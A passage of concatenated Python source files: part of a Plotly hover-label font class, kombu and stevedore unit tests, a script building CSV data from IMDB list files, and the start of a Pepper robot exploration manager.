the system. The Chart Studio Cloud (at https://chart-
studio.plotly.com or on-premise) generates images on a server,
where only a select number of fonts are installed and
supported. These include "Arial", "Balto", "Courier New",
"Droid Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on Chart Studio Cloud for `family`.
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on Chart Studio Cloud for `size`.
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud for
`family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud for
`size`.
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Font object
Sets the font used in hover labels.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.box.hoverlabel.Font`
color
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud for
`family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud for
`size`.
Returns
-------
Font
"""
super(Font, self).__init__("font")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.box.hoverlabel.Font
constructor must be a dict or
an instance of :class:`plotly.graph_objs.box.hoverlabel.Font`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("colorsrc", None)
_v = colorsrc if colorsrc is not None else _v
if _v is not None:
self["colorsrc"] = _v
_v = arg.pop("family", None)
_v = family if family is not None else _v
if _v is not None:
self["family"] = _v
_v = arg.pop("familysrc", None)
_v = familysrc if familysrc is not None else _v
if _v is not None:
self["familysrc"] = _v
_v = arg.pop("size", None)
_v = size if size is not None else _v
if _v is not None:
self["size"] = _v
_v = arg.pop("sizesrc", None)
_v = sizesrc if sizesrc is not None else _v
if _v is not None:
self["sizesrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
|
import pytest
import socket
from amqp import RecoverableConnectionError
from unittest.mock import Mock, patch
from case import ContextMock
from kombu import common
from kombu.common import (
Broadcast, maybe_declare,
send_reply, collect_replies,
declaration_cached, ignore_errors,
QoS, PREFETCH_COUNT_MAX, generate_oid
)
from t.mocks import MockPool
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: Unbound mock Entity (will bind to channel when bind called
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because its already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(self, *exc_info):
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
|
from mock import Mock, sentinel
from stevedore import (ExtensionManager, NamedExtensionManager, HookManager,
DriverManager, EnabledExtensionManager)
from stevedore.dispatch import (DispatchExtensionManager,
NameDispatchExtensionManager)
from stevedore.extension import Extension
from stevedore.tests import utils
test_extension = Extension('test_extension', None, None, None)
test_extension2 = Extension('another_one', None, None, None)
mock_entry_point = Mock(module_name='test.extension', attrs=['obj'])
a_driver = Extension('test_driver', mock_entry_point, sentinel.driver_plugin,
sentinel.driver_obj)
# base ExtensionManager
class TestTestManager(utils.TestCase):
def test_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = ExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_instance_should_have_default_namespace(self):
em = ExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_instance_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = ExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_extension_name_should_be_listed(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertIn(test_extension.name, em.names())
def test_iterator_should_yield_extension(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertEqual(test_extension, next(iter(em)))
def test_manager_should_allow_name_access(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertEqual(test_extension, em[test_extension.name])
def test_manager_should_call(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock()
em.map(func)
func.assert_called_once_with(test_extension)
def test_manager_should_call_all(self):
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
func = Mock()
em.map(func)
func.assert_any_call(test_extension2)
func.assert_any_call(test_extension)
def test_manager_return_values(self):
def mapped(ext, *args, **kwds):
return ext.name
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
results = em.map(mapped)
self.assertEqual(sorted(results), ['another_one', 'test_extension'])
def test_manager_should_eat_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock(side_effect=RuntimeError('hard coded error'))
results = em.map(func, 1, 2, a='A', b='B')
self.assertEqual(results, [])
def test_manager_should_propagate_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension],
propagate_map_exceptions=True)
self.skipTest('Skipping temporarily')
func = Mock(side_effect=RuntimeError('hard coded error'))
em.map(func, 1, 2, a='A', b='B')
# NamedExtensionManager
def test_named_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_named_manager_should_have_default_namespace(self):
em = NamedExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_named_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = NamedExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_named_manager_should_populate_names(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(em.names(), ['test_extension', 'another_one'])
# HookManager
def test_hook_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_hook_manager_should_be_first_extension_name(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
# This will raise KeyError if the names don't match
assert(em[test_extension.name])
def test_hook_manager_should_have_default_namespace(self):
em = HookManager.make_test_instance([test_extension])
self.assertEqual(em.namespace, 'TESTING')
def test_hook_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = HookManager.make_test_instance([test_extension],
namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_hook_manager_should_return_named_extensions(self):
hook1 = Extension('captain', None, None, None)
hook2 = Extension('captain', None, None, None)
em = HookManager.make_test_instance([hook1, hook2])
self.assertEqual([hook1, hook2], em['captain'])
# DriverManager
def test_driver_manager_should_use_supplied_extension(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual([a_driver], em.extensions)
def test_driver_manager_should_have_default_namespace(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(em.namespace, 'TESTING')
def test_driver_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = DriverManager.make_test_instance(a_driver, namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_instance_should_use_driver_name(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(['test_driver'], em.names())
def test_instance_call(self):
def invoke(ext, *args, **kwds):
return ext.name, args, kwds
em = DriverManager.make_test_instance(a_driver)
result = em(invoke, 'a', b='C')
self.assertEqual(result, ('test_driver', ('a',), {'b': 'C'}))
def test_instance_driver_property(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(sentinel.driver_obj, em.driver)
# EnabledExtensionManager
def test_enabled_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = EnabledExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
# DispatchExtensionManager
def test_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = DispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_dispatch_map_should_invoke_filter_for_extensions(self):
em = DispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
filter_func = Mock(return_value=False)
args = ('A',)
kw = {'big': 'Cheese'}
em.map(filter_func, None, *args, **kw)
filter_func.assert_any_call(test_extension, *args, **kw)
filter_func.assert_any_call(test_extension2, *args, **kw)
# NameDispatchExtensionManager
def test_name_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_name_dispatch_instance_should_build_extension_name_map(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(test_extension, em.by_name[test_extension.name])
self.assertEqual(test_extension2, em.by_name[test_extension2.name])
def test_named_dispatch_map_should_invoke_filter_for_extensions(self):
em = NameDispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
func = Mock()
args = ('A',)
kw = {'BIGGER': 'Cheese'}
em.map(['test_extension'], func, *args, **kw)
func.assert_called_once_with(test_extension, *args, **kw)
|
|
"""Build the tutorial data files from the IMDB *.list.gz files."""
import csv
import gzip
import os
import re
import sys
from datetime import datetime
split_on_tabs = re.compile(b'\t+').split
BAD_GENRES = {b'Adult', b'Documentary', b'Short', b'Horror', b'Reality-TV',
b'Talk-Show', b'Game-Show', b'Reality-tv'}
def main():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
if not os.path.isdir('../data'):
os.makedirs('../data')
# Load movie titles.
titles = set()
uninteresting_titles = set()
lines = iter(gzip.open('genres.list.gz'))
line = next(lines)
while line != b'8: THE GENRES LIST\n':
line = next(lines)
assert next(lines) == b'==================\n'
assert next(lines) == b'\n'
print('Reading "genres.list.gz" to find interesting movies')
for line in lines:
if not_a_real_movie(line):
continue
fields = split_on_tabs(line.strip(b'\n'))
raw_title = fields[0]
genre = fields[1]
try:
raw_title.decode('ascii')
except UnicodeDecodeError:
continue
if genre in BAD_GENRES:
uninteresting_titles.add(raw_title)
else:
titles.add(raw_title)
interesting_titles = titles - uninteresting_titles
del titles
del uninteresting_titles
print('Found {0} titles'.format(len(interesting_titles)))
print('Writing "titles.csv"')
with open('../data/titles.csv', 'w') as f:
output = csv.writer(f)
output.writerow(('title', 'year'))
for raw_title in interesting_titles:
title_and_year = parse_title(raw_title)
output.writerow(title_and_year)
print('Finished writing "titles.csv"')
print('Reading release dates from "release-dates.list.gz"')
lines = iter(gzip.open('release-dates.list.gz'))
line = next(lines)
while line != b'RELEASE DATES LIST\n':
line = next(lines)
assert next(lines) == b'==================\n'
output = csv.writer(open('../data/release_dates.csv', 'w'))
output.writerow(('title', 'year', 'country', 'date'))
for line in lines:
if not_a_real_movie(line):
continue
if line.startswith(b'----'):
continue
fields = split_on_tabs(line.strip(b'\n'))
if len(fields) > 2: # ignore "DVD premier" lines and so forth
continue
raw_title = fields[0]
if raw_title not in interesting_titles:
continue
title, year = parse_title(raw_title)
if title is None:
continue
country, datestr = fields[1].decode('ascii').split(':')
try:
date = datetime.strptime(datestr, '%d %B %Y').date()
except ValueError:
continue # incomplete dates like "April 2014"
output.writerow((title, year, country, date))
print('Finished writing "release_dates.csv"')
if sys.version_info < (3, 0):
output = csv.writer(open('../data/cast.csv', 'w'))
else:
output = csv.writer(open('../data/cast.csv', 'w', encoding='utf-8'))
output.writerow(('title', 'year', 'name', 'type', 'character', 'n'))
for role_type, filename in (
('actor', 'actors.list.gz'),
('actress', 'actresses.list.gz'),
):
print('Reading {0!r}'.format(filename))
lines = iter(gzip.open(filename))
line = next(lines)
while (b'Name' not in line) or (b'Titles' not in line):
line = next(lines)
assert b'----' in next(lines)
for line in lines:
if line.startswith(b'----------------------'):
break
line = line.rstrip()
if not line:
continue
fields = split_on_tabs(line.strip(b'\n'))
if fields[0]:
name = decode_ascii(fields[0])
name = swap_names(name)
if len(fields) < 2:
raise ValueError('broken line: {!r}'.format(line))
if not_a_real_movie(fields[1]):
continue
fields = fields[1].split(b' ')
raw_title = fields[0]
if raw_title not in interesting_titles:
continue
if len(fields) < 2:
continue
if fields[1].startswith(b'('): # uncredited, archive footage, etc
del fields[1]
if len(fields) < 2:
continue
if not fields[1].startswith(b'['):
continue
character = decode_ascii(fields[1].strip(b'[]'))
if len(fields) > 2 and fields[2].startswith(b'<'):
n = int(fields[2].strip(b'<>'))
else:
n = ''
title, year = parse_title(raw_title)
if title is None:
continue
if character == 'N/A':
clist = ['(N/A)']
else:
clist = character.split('/')
for character in clist:
if not character:
continue
output.writerow((title, year, name, role_type, character, n))
print('Finished writing "cast.csv"')
def not_a_real_movie(line):
return (
line.startswith(b'"') # TV show
or b'{' in line # TV episode
or b' (????' in line # Unknown year
or b' (TV)' in line # TV Movie
or b' (V)' in line # Video
or b' (VG)' in line # Video game
or b' (segment ' in line # Anthology film
)
match_title = re.compile(r'^(.*) \((\d+)(/[IVXL]+)?\)$').match
def parse_title(raw_title):
try:
title = raw_title.decode('ascii')
except UnicodeDecodeError:
return None, None
m = match_title(title)
title = m.group(1)
year = int(m.group(2))
numeral = m.group(3)
if numeral is not None:
numeral = numeral.strip('/')
if numeral != 'I':
title = '{0} ({1})'.format(title, numeral)
return title, year
def swap_names(name):
if name.endswith(' (I)'):
name = name[:-4]
if ',' in name:
last, first = name.split(',', 1)
name = first.strip() + ' ' + last.strip()
return name
def decode_ascii(s):
return s.decode('latin-1') #ascii', 'replace').replace(u'\ufffd', u'?')
if __name__ == '__main__':
main()
|
|
import qi
import os
import time
import cv2
import numpy as np
import almath as m
import base64
import sys
try:
import cPickle as pickle
except:
import pickle
try:
from almath import OccupancyMapParams
from almath import Point2Di
except:
class Point2Di:
def __init__(self, x, y):
self.x = x
self.y = y
class OccupancyMapParams:
def __init__(self, size, metersPerPixel, originOffest):
self.size = size
self.metersPerPixel = metersPerPixel
# Metric coordinates of the (0, 0) pixel.
self.originOffset = m.Position2D(0, 0)
self.originOffset.x = originOffest.x
self.originOffset.y = originOffest.y
def getPositionFromPixel(self, pixel):
return m.Position2D(pixel.x * self.metersPerPixel + self.originOffset.x, -pixel.y * self.metersPerPixel + self.originOffset.y)
def getPixelFromPosition(self, position):
return m.Position2D((position.x - self.originOffset.x) / self.metersPerPixel, (self.originOffset.y - position.y) / self.metersPerPixel)
@qi.multiThreaded()
class EventHelper:
def __init__(self, memory, subscribers):
self.subscribers = subscribers
self.memory = memory
self.serviceName = "EventHelper"
self.subscribeToggle= False
self.connectSubscribers()
@qi.bind()
def connectSubscribers(self):
""" generate & connect all subscribers to callbacks """
if not self.subscribeToggle:
for event in self.subscribers.keys():
self.subscribers[event]["subscriber"] = self.memory.subscriber(event)
self.subscribers[event]["uid"] = self.subscribers[event]["subscriber"].signal.connect(self.subscribers[event]["callback"])
self.subscribeToggle = True
@qi.bind()
def disconnectSubscribers(self):
""" disconnect all subscribers from callbacks """
qi.info(self.serviceName, "DISCONNECTING SUBSCRIBERS")
if self.subscribeToggle:
for event in self.subscribers.keys():
future = qi.async(self.disconnectSubscriber, event, delay = 0)
future.wait(1000) # add a timeout to avoid deadlock
if not future.isFinished():
qi.error(self.serviceName, "disconnectSubscribers", "Failed disconnecting %s subscribers" % event)
self.subscribeToggle = False
class ExplorationManager:
def __new__(cls, session):
return super(ExplorationManager, cls).__new__(cls)
def __init__(self, session):
self.session = session
self.nav = self.session.service("ALNavigation")
self.tabletService = self.session.service("ALTabletService")
self.memory = self.session.service("ALMemory")
self.application_name = "ExplorationManager"
self.explorer_application_name = "Explorer"
self.current_places = None
self.logger = qi.Logger("ExplorationManager")
self.explo_extension = ".explo"
self.places_extension = ".places"
self.packageUid = "exploration-manager"
self.subscribers = {
"Places/LoadPlaces": {"callback": self.loadPlaces},
"Places/Save": {"callback": self.savePlacesCallback},
"Places/AddPlace": {"callback": self.addPlaceCallback},
"Places/Reset": {"callback":self.resetPlacesCallback}
}
self.events = {"metricalMap": "ExplorationManager/MetricalMap",
"places": "ExplorationManager/Places"}
self.eventHelper = EventHelper(self.memory, self.subscribers)
def isExplorationLoaded(self):
try:
self.nav.getExplorationPath()
